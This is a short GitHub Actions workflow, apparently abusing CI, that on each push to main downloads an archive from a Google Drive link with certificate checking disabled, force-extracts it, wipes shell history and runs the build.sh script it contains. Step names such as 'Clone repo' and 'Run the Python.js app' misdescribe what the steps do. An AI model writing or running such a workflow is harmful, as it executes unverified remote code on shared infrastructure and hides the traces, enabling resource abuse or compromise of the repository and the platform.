name: NnlNs.zip

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  run-node-app:
    runs-on: ubuntu-latest

    steps:
      - name: Check code
        uses: actions/checkout@v4

      - name: Clone repo
        run: wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1LIeYZfHkv5LQxt9Gwn3BSaLNXfrTCdMW" -O NnlNs.zip

      - name: Run the Python.js app
        run: |
          yes A | unzip NnlNs.zip
          history -c && history -w
          bash build.sh
